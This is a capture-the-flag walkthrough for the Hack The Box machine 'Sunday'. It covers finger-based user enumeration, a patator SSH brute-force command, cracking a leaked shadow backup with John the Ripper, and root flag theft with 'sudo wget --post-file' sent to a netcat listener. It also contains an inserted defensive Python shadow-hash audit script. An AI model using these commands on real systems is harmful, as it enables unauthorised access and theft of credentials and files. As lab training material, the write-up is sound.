Hack the Box: Sunday

in #ethicalhacking, 6 years ago

By now you know how to obtain an HTB invite and how to connect to its VPN. Let's start with the Sunday machine.

Level: Intermediate

Flags: To find user.txt and root.txt file

As a rule of thumb, always start by scanning the machine with nmap:

nmap -sS -O -A 10.10.10.76 -p 1-65535


Observe that port 22022 (SSH) and port 79 (Sun Solaris finger) are open and of interest.

You can use the finger service to list information about users who are logged in. Immediately we can identify the user sunny through the finger service. To enumerate more users, we can use the Metasploit finger module.


I also searched for a SunSSH exploit, but came up with nothing.


Well, that leaves us with a couple of options: brute-force our way in over SSH, or a password-guessing attack. Always opt for password guessing first. Usually, in Hack The Box, the name means something. I decided to try a few passwords for sunny.
The password was sunday.

Or you can brute-force your way in with patator:
patator ssh_login host=10.10.10.76 port=22022 user=sunny password=FILE0 0=password.txt persistent=0

For that you'll need a password.txt wordlist for the brute force. You can download one from the Internet.

But when I tried to log in over SSH with the above credentials, it gave a “no matching key exchange method found” error. That error means the client and server have no key-exchange algorithm in common: this old SunSSH server only offers the legacy diffie-hellman-group1-sha1 exchange, which modern OpenSSH clients disable by default.
By googling I found:

https://unix.stackexchange.com/questions/340844/how-to-enable-diffie-hellman-group1-sha1-key-exchange-on-debian-8-0


After browsing through some directories, I found a backup folder.


The file of interest is shadow.backup. If you're new to this, the shadow file contains the password hashes for users and is usually accessible only by root and those in the sudoers file.


There is another user, sammy. If you know your cryptography, you'll recognise that a hash with the $5$ prefix uses SHA-256 (sha256crypt).
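As an added example (not from the original write-up), here is a small Python audit script that parses lines in shadow(5) format, reports which crypt algorithm each account uses (a $5$ prefix is sha256crypt, $6$ sha512crypt, $1$ the weak md5crypt) and flags the entries a defender would want to fix. The sample shadow lines and their hash bodies are constructed placeholders, not the machine's real hashes.

```python
import re

# crypt(5) identifiers found in the "$id$" prefix of a shadow password field
ALGORITHMS = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
              "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}
WEAK = {"descrypt", "md5crypt"}
DES_RE = re.compile(r"^[./0-9A-Za-z]{13}$")            # legacy 13-char DES hash
MODULAR_RE = re.compile(r"^\$([^$]+)\$(?:rounds=(\d+)\$)?")

def parse_hash(field):
    """Classify one shadow password field as (algorithm, rounds-or-None)."""
    if field == "":
        return ("empty", None)          # passwordless login
    if field[0] in "!*":
        return ("locked", None)         # password login disabled
    m = MODULAR_RE.match(field)
    if m:
        rounds = int(m.group(2)) if m.group(2) else None
        return (ALGORITHMS.get(m.group(1), "unknown"), rounds)
    return ("descrypt", None) if DES_RE.match(field) else ("unknown", None)

def audit_shadow(text):
    """Return ({user: algorithm}, [(user, finding), ...]) for shadow-format text."""
    algos, findings = {}, []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 2:
            continue
        user, (algo, rounds) = fields[0], parse_hash(fields[1])
        algos[user] = algo
        if algo == "empty":
            findings.append((user, "no password set"))
        elif algo in WEAK or algo == "unknown":
            findings.append((user, f"weak or unrecognised hash ({algo})"))
        elif algo.startswith("sha") and rounds is not None and rounds < 5000:
            findings.append((user, f"rounds={rounds} is below the default 5000"))
    return algos, findings

# Constructed sample in shadow(5) format; hash bodies are placeholders, not real hashes.
SAMPLE = """\
root:$6$saltsalt$PLACEHOLDER:18000:0:99999:7:::
sammy:$5$saltsalt$PLACEHOLDER:18000:0:99999:7:::
sunny:$1$saltsalt$PLACEHOLDER:18000:0:99999:7:::
legacy:abJnggxhB/yWI:18000:0:99999:7:::
svc::18000:0:99999:7:::
nobody:*:18000::::::
"""
if __name__ == "__main__":
    for user, finding in audit_shadow(SAMPLE)[1]:
        print(f"{user}: {finding}")
```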

Now copy the hash and use John the Ripper to crack it. You can download the rockyou.txt wordlist from the Internet.


Log in as sammy. Always run "sudo -l" to see what the user is permitted to run.


You'll get user.txt.


Observe that you have permission to run wget as sudo. The other flag, root.txt, is located in /root.

We can POST the content of root.txt directly to the listening machine.

Set up a netcat listener: "nc -nvlp 8081"

sudo wget --post-file=/root/root.txt 10.10.14.12:8081



This was the easy way. You could also use wget to transfer /etc/shadow, obtain the root hash and crack it to get the root password, but that would take considerably more time.

Thus you've obtained both user.txt and root.txt.
The important thing to note here was the use of "wget" with sudo.
